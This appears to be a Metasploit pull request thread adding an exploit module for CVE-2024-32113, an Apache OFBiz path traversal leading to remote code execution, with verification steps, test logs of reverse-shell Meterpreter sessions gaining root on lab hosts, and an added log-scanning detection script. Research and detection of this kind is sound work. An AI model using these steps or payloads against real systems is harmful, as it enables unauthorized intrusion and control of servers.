
Apache OFBiz Directory Traversal RCE [CVE-2024-32113] #19249

Conversation

jheysel-r7 (Contributor)

Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which in turn allows for remote code execution in the context of the user running the application.

When exploiting on Windows, the module currently requires a PowerShell payload to be selected. This payload limitation is outlined in more detail in the documentation.

Verification Steps

  1. Start msfconsole
  2. Do: use apache_ofbiz_forgot_password_directory_traversal
  3. Set the RHOST and LHOST options
  4. Run the module
  5. Receive a session in the context of the user running Apache OFBiz.
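As an added defender-side example (not part of this PR or the Metasploit module), the following Python scans constructed access-log lines for requests that use a traversal segment under /webtools/control/ to resolve to the ProgramExport endpoint described above, and checks a reported OFBiz version against the 18.12.13 fix threshold. The sample log lines, IP addresses and the combined-log regex are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not from the PR); the
# second and third use a traversal segment to reach ProgramExport.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jun/2024:10:55:01 -0400] "GET /webtools/control/forgotPassword HTTP/1.1" 200 512
10.0.0.7 - - [17/Jun/2024:10:56:10 -0400] "POST /webtools/control/forgotPassword/..%2FProgramExport HTTP/1.1" 200 2048
10.0.0.7 - - [17/Jun/2024:10:56:12 -0400] "POST /webtools/control/forgotPassword/../ProgramExport?x=1 HTTP/1.1" 200 2048
10.0.0.9 - - [17/Jun/2024:10:57:00 -0400] "GET /webtools/control/main HTTP/1.1" 302 0
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
VULN_BASE = "/webtools/control/"
TRAVERSED_TARGET = "ProgramExport"

def normalize_path(target):
    """Drop the query string, percent-decode twice (double encoding), collapse dot segments."""
    path = unquote(unquote(target.split("?", 1)[0]))
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
        else:
            out.append(seg)
    return "/" + "/".join(out)

def classify(line):
    """Return a hit record when a request uses '..' traversal and lands on ProgramExport."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw = m.group("target")
    norm = normalize_path(raw)
    if ".." in unquote(unquote(raw)) and norm == VULN_BASE + TRAVERSED_TARGET:
        return {"ip": m.group("ip"), "ts": m.group("ts"), "raw": raw,
                "normalized": norm, "status": int(m.group("status"))}
    return None

def scan(log_text):
    """Run classify over every line and keep only the hits."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

def is_vulnerable_version(version):
    """Per the PR description, releases before 18.12.13 are affected."""
    return tuple(int(p) for p in version.split(".")) < (18, 12, 13)
```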

@jheysel-r7 jheysel-r7 added the module, docs and rn-modules (release notes for new or majorly enhanced modules) labels Jun 7, 2024
@jheysel-r7 (Contributor, Author)

@msjenkins-r7 retest this please

@smcintyre-r7 smcintyre-r7 self-assigned this Jun 7, 2024
@rapid7 rapid7 deleted a comment Jun 7, 2024
@jheysel-r7 jheysel-r7 force-pushed the apache_ofbiz_forgot_password_directory_traversal branch from 915e190 to e14dd93 on June 15, 2024 00:00
@smcintyre-r7 smcintyre-r7 (Contributor) left a comment

I tested this out on both a Windows and Linux target. I used multiple payloads for Windows to confirm the issue I had originally was no longer present. At this time, everything looks good to me and appears to be working as intended.

I'll go ahead and get this landed.

Linux Testing Output

metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Tested remote code execution successfully
[*] Attempting to exploit...
[*] Sending stage (3045380 bytes) to 192.168.159.128
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.128:42422) at 2024-06-17 10:56:18 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.250.134
OS           : Debian 11.4 (Linux 6.8.11-300.fc40.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/usr/src/apache-ofbiz
meterpreter > 

Windows Testing Output

metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp
metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > check
[+] 192.168.159.10:8443 - The target is vulnerable. Tested remote code execution successfully
metasploit-framework.pr (S:0 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Tested remote code execution successfully
[*] Attempting to exploit...
[*] Sending stage (201798 bytes) to 192.168.159.10
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.10:59322) at 2024-06-17 11:19:57 -0400

meterpreter > getuid
Server username: MSFLAB\smcintyre
meterpreter > sysinfo
Computer        : DC
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > pwd
C:\ofbiz
meterpreter > background 
[*] Backgrounding session 4...
metasploit-framework.pr (S:1 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > set PAYLOAD cmd/windows/powershell/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/reverse_tcp
metasploit-framework.pr (S:1 J:0) exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Tested remote code execution successfully
[*] Attempting to exploit...
[*] Sending stage (176198 bytes) to 192.168.159.10
[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.10:59324) at 2024-06-17 11:20:37 -0400

meterpreter > getuid
Server username: MSFLAB\smcintyre
meterpreter > 

@smcintyre-r7 smcintyre-r7 merged commit 818d67b into rapid7:master Jun 17, 2024
39 checks passed
@smcintyre-r7 (Contributor)

Release Notes

This adds an exploit for CVE-2024-32113, which is an unauthenticated RCE in Apache OFBiz.
